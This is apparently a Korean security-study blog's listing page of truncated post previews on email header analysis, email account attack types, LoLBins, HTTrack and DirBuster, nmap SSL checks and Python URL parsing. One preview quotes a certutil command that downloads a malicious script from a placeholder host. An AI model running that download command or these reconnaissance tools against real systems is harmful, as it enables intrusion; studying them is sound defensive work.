1. 이메일을 전송한 클라이언트의 IP 주소를 확인할 수 있는 필드 : X-Originating-IP 2. 이메일을 이용한 해킹 기법 - 이메일 계정을 해킹하여 도용하는 EAC(email account compromise) - 이메일 계정 해킹 없이 발신자를 그럴듯하게 위장하는 스푸핑 - BEC(business email compromise): 피해자가 평소 신뢰하고 있던 이메일로부터 들어오는 사기 공격 3. 특정 개인의 이메일 계정을 해킹하는 기법? - 키 로깅 통해 사용자가 입력하는 id passwd 수집 - 피싱 메일 통해 타겟의 password 입력하도록 유도 - 메일 서버의 취약점 이용하여 사용자 인증 우회 4. Message ID 분석 - Message ID는 MUA(mail user agen..

1. LoL Bins를 악용한 공격 스크립트 분석 certutil.exe -urlcache -split -f https://example.com/mal.ps1 c:\temp:zip 1) urlcache 옵션은 인증기관 인증서 설치를 위해 사용한다. ▶ URL 캐시 항목을 표시 또는 삭제하는 역할 2) 다운로드 받은 스크립트 파일은 ADS영역에 저장 ▶https://lolbas-project.github.io/lolbas/Binaries/Certutil/ 3) 스크립트 파일은 c:\temp에 zip 형태로 저장. 4) certutil은 저장된 사용자 이름과 암호 또는 자격 증명을 만들어 나열하고 삭제하는 역할. ▶ Cmdkey.exe 2. LoL Bins들 나열.. 이들의 기능 설명 1) Cmdkey.ex..

보호되어 있는 글입니다.

보호되어 있는 글입니다.

이전 게시글과의 구분용 게시글

[HTTrack] website copier라고 불리운다. 해당 툴을 사용하면 입력한 웹사이트를 그대로 복사하여 내 PC에 폴더-파일을 만들어줌. 그러니까.. 해당 웹 페이지의 모든 리소스(이미지, 페이지 파일, 첨부 파일 등..)를 다운로드하는 것. 폴더 구조까지 그대로 가져오기에 웹사이트 구조를 분석하기에 좋다. 관리자 페이지 찾는 용도로 사용 가능. [DirBuster] HTTrack은 모든 링크를 클릭해서 모든 파일을 다운로드한다면, DirBuster는 패스워드 크래킹하듯 모든 경로를 만들어서 입력해봄. 응답되는 상태 코드를 토대로 웹 페이지의 구조를 가져온다. 숨겨진 페이지 찾기 좋고, 존재하는 페이지만을 가져온다. 실 페이지에 사용 금지 ^__^

1. NMAP nmap --script ssl-enum-ciphers -p443 unprivileged 2. 온라인 홈페이지 통한 SSL 버전 확인 https://www.ssllabs.com/ssltest/index.html SSL Server Test (Powered by Qualys SSL Labs) SSL Server Test This free online service performs a deep analysis of the configuration of any SSL web server on the public Internet. Please note that the information you submit here is used only to provide you the service. We d..

url을 다룰 수 있는 모듈: urllib.parse urllib.parse.urlparse(): 입력된 URL을 분석해서 ParseResult 클래스로 리턴 scheme = 통신 프로토콜 path = 경로 params = 파라미터 query = 쿼리 fragment = 플래그먼트 ParseResult 클래스 Entity SQL 파서 결과 정보 ms doc [예제] from urllib import parse urlp=parse.urlparse('https://www.baba_example.org/index.html?exParam=1&exParam=2#this_is_fragment') print(urlp) # ParseResult(scheme='https', netloc='www.baba_example...